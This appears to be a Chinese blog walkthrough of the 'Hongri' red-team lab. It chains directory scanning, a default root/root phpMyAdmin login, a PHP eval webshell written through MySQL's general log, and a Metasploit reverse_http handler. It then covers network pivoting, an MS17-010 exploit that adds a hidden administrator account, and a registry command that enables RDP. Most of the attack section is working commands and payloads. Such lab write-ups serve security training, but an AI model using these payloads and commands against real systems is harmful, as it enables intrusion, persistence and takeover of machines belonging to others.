红日靶场(1)

阅读: 评论:0

红日靶场(1)

红日靶场(1)

📦靶场搭建

📦渗透测试流程

1.目录扫描:

python3 dirsearch.py -u 网站的url

2. 测试mysql数据库连接密码,并进入phpmyadmin
 

账号:root
密码:root

3.尝试导入一句话木马,发现拒绝导入

select '<?php eval($_POST[hack]);?>' into outfile 'C:/phpstudy/www/hack.php'
导入一句话木马show global variables like '%secure%'
查询有关secure的信息secure_file_priv null
如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,MySQL服务不会创建它;
如果这个参数为NULL,MySQL服务会禁止导入和导出操作

 

4.通过日志写shell,并用蚁剑连接

show global variables like '%gengeral_%'
查询输出有关general信息set global general_log=ON;
打开日志set global general_log_file='C:/phpStudy/WWW/hack.php'
更改日志路径select '<?php eval($_POST[hack]);?>'
日志写shell“MySQL的session和global一般使用在终端,用来对配置进行暂时设置,当数据库服务重启就会失效。

 

5.查看当前用户权限为administrators,使用CS上线

6.CS 和MSF联合

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.177.227
set lport 2222
exploit

 

 7.发现其他网段,扫描网段主机,创建代理

run autoroute -s 192.168.52.0/24
创建52网段路由run autoroute -p
查看路由信息

run post/windows/gather/arp_scanner rhosts=192.168.52.0/24

 

search socks
查找socksuse auxiliary/server/socks_proxy
进入show options
查看信息set VERSION 4a
将版本切换到4aset SRVHOST x
将ip设置为当前ip

 

7.使用nmap扫描端口,

proxychains nmap -Pn -sT 192.168.52.141

 

 8.发现具有445端口,使用MSF17_010模块添加用户,并添加到管理员用户。

use auxiliary/admin/smb/ms17_010_commandset rhosts 192.168.52.141set COMMAND net user hack Kongbai123 /add

set COMMAND net localgroup administrators
添加到管理员用户

 

set COMMAND REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f打开目标及3389端口

 

 

 9.通过远程桌面连接

proxychains rdesktop 192.168.52.141

 

 10.探测域控主机是否开启445端口

利用方法如法炮制,不在复现。

本文发布于:2024-02-01 16:45:28,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170677712938033.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

上一篇:红日
标签:靶场   红日
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23